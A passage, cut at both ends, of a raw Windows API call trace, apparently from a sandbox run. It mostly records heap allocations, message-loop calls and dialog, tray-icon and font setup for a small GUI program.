lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.648] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.648] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.648] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53240 [0248.648] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.649] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.649] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.649] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.649] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe33dd0 [0248.649] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531f0 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c88 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53240 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40af0 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53250 [0248.649] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53250 | out: hHeap=0xbe0000) returned 1 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8970 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53250 [0248.649] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x70) returned 0xdffa58 [0248.649] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8970 | out: hHeap=0xbe0000) returned 1 [0248.649] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.649] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.649] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531f0 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c88 | out: hHeap=0xbe0000) returned 1 [0248.650] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.650] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33dd0 | out: hHeap=0xbe0000) returned 1 [0248.650] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01610 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41d0 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe51328 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53310 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d7b0 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe512f0 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d440 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe512b8 | out: hHeap=0xbe0000) returned 1 [0248.650] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53350 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d3f0 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdffa58 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53250 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41b8 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41e8 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d788 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532d0 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d7d8 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe51280 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5f8 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8af0 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d918 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87f0 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe67f28 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53220 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a18 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c60 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532e0 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8c8 | out: hHeap=0xbe0000) returned 1 [0248.651] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.651] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532e0 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40af0 [0248.652] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.652] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532e0 | out: hHeap=0xbe0000) returned 1 [0248.652] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526f0 | out: hHeap=0xbe0000) returned 1 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe33dd0 [0248.652] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526f0 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8c8 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532e0 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a18 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53220 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40af0 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe61b90 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53210 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87f0 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531e0 [0248.652] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe61b90 | out: hHeap=0xbe0000) returned 1 [0248.652] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53210 [0248.652] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x230) returned 0xe61b90 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87f0 | out: hHeap=0xbe0000) returned 1 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.653] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.653] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x480) returned 0xe67f28 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe61b90 | out: hHeap=0xbe0000) returned 1 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.653] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe61b90 [0248.653] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531e0 [0248.653] GetComputerNameW (in: lpBuffer=0x8bf120, nSize=0x8bf43c | out: lpBuffer="XDUWTFONO", nSize=0x8bf43c) returned 1 [0248.653] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.653] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d918 [0248.653] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe61b90 | out: hHeap=0xbe0000) returned 1 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d918 | out: hHeap=0xbe0000) returned 1 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.653] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.653] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.653] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.653] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe61b90 [0248.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87f0 [0248.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531e0 [0248.654] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe61b90 | out: hHeap=0xbe0000) returned 1 [0248.654] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0248.654] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87f0 | out: hHeap=0xbe0000) returned 1 [0248.654] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.654] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe61b90 [0248.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531e0 [0248.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87f0 [0248.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.654] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe61b90 | out: hHeap=0xbe0000) returned 1 [0248.654] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531e0 | out: hHeap=0xbe0000) returned 1 [0248.654] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87f0 | out: hHeap=0xbe0000) returned 1 [0248.661] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.661] NtdllDialogWndProc_W () returned 0x0 [0248.661] GetStockObject (i=17) returned 0x18a0025 [0248.661] SendMessageW (hWnd=0x300a2, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x1 [0248.662] GetWindowTextLengthW (hWnd=0x300a2) returned 413 [0248.662] SendMessageW (hWnd=0x300a2, Msg=0xb1, wParam=0x19d, lParam=0x19d) returned 0x1 [0248.662] GetClientRect (in: hWnd=0x300a2, lpRect=0x8bf470 | out: lpRect=0x8bf470) returned 1 [0248.662] GetWindowRect (in: hWnd=0x300a2, lpRect=0x8bf470 | out: lpRect=0x8bf470) returned 1 [0248.662] SetWindowLongW (hWnd=0x300a2, nIndex=-21, dwNewLong=8) returned 0 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe683b0 | out: hHeap=0xbe0000) returned 1 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe67f28 | out: hHeap=0xbe0000) returned 1 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a18 | out: hHeap=0xbe0000) returned 1 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87f0 | out: hHeap=0xbe0000) returned 1 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8af0 | out: hHeap=0xbe0000) returned 1 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41e8 | out: hHeap=0xbe0000) returned 1 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8c8 | out: hHeap=0xbe0000) returned 1 [0248.662] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526f0 | out: hHeap=0xbe0000) returned 1 [0248.662] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8c8 [0248.662] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41e8 [0248.662] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526f0 [0248.663] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.663] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0248.663] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 0 [0248.663] TranslateMessage (lpMsg=0x8bf904) returned 0 [0248.663] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0248.663] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe67f28 [0248.663] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53210 [0248.663] Shell_NotifyIconW (dwMessage=0x1, lpData=0x8befa0) returned 1 [0248.663] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe67f28 | out: hHeap=0xbe0000) returned 1 [0248.663] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.663] KillTimer (hWnd=0x5014a, uIDEvent=0x1) returned 1 [0248.663] SetTimer (hWnd=0x5014a, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0248.664] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0248.664] TranslateMessage (lpMsg=0x8bf904) returned 0 [0248.664] DispatchMessageW (lpMsg=0x8bf904) returned 0xffffffff [0248.664] GetForegroundWindow () returned 0x10058 [0248.664] GetWindowLongW (hWnd=0x10058, nIndex=-21) returned 0 [0248.664] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d918 [0248.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8af0 [0248.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532d0 [0248.664] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532d0 | out: hHeap=0xbe0000) returned 1 [0248.664] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87f0 [0248.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.664] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.664] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.664] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.664] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a18 [0248.665] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0248.665] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41d0 [0248.665] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0248.665] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c88 [0248.665] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53210 [0248.665] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8970 [0248.665] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532d0 [0248.665] GetDC (hWnd=0x0) returned 0x270101c5 [0248.665] GetDeviceCaps (hdc=0x270101c5, index=90) returned 96 [0248.665] ReleaseDC (hWnd=0x0, hDC=0x270101c5) returned 1 [0248.665] CreateFontW (cHeight=-16, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x370a01db [0248.665] SendMessageW (hWnd=0x300a2, Msg=0x30, wParam=0x370a01db, lParam=0x1) returned 0x1 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8970 | out: hHeap=0xbe0000) returned 1 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532d0 | out: hHeap=0xbe0000) returned 1 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c88 | out: hHeap=0xbe0000) returned 1 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8af0 | out: hHeap=0xbe0000) returned 1 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87f0 | out: hHeap=0xbe0000) returned 1 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41d0 | out: hHeap=0xbe0000) returned 1 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a18 | out: hHeap=0xbe0000) returned 1 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d918 | out: hHeap=0xbe0000) returned 1 [0249.020] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.020] TranslateMessage (lpMsg=0x8bf904) returned 0 [0249.020] DispatchMessageW (lpMsg=0x8bf904) returned 0xffffffff [0249.020] GetForegroundWindow () returned 0x10058 [0249.020] GetWindowLongW (hWnd=0x10058, nIndex=-21) returned 0 [0249.020] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0249.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33dd0 | out: hHeap=0xbe0000) returned 1 [0249.020] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0249.021] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d918 [0249.021] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a18 [0249.021] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53210 [0249.021] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xea4cc8 [0249.021] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532d0 [0249.021] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xea4cc8 | out: hHeap=0xbe0000) returned 1 [0249.021] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532d0 | out: hHeap=0xbe0000) returned 1 [0249.021] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53210 | out: hHeap=0xbe0000) returned 1 [0249.021] ShowWindow (hWnd=0x30150, nCmdShow=5) returned 0 [0249.021] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.021] NtdllDialogWndProc_W () returned 0x0 [0249.021] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.021] NtdllDialogWndProc_W () returned 0x0 [0249.036] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.036] NtdllDialogWndProc_W () returned 0x0 [0249.040] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.040] NtdllDialogWndProc_W () returned 0x0 [0249.040] NtdllDefWindowProc_W () returned 0x0 [0249.041] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.041] NtdllDialogWndProc_W () returned 0x1 [0249.077] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.077] GetWindowLongW (hWnd=0x30150, 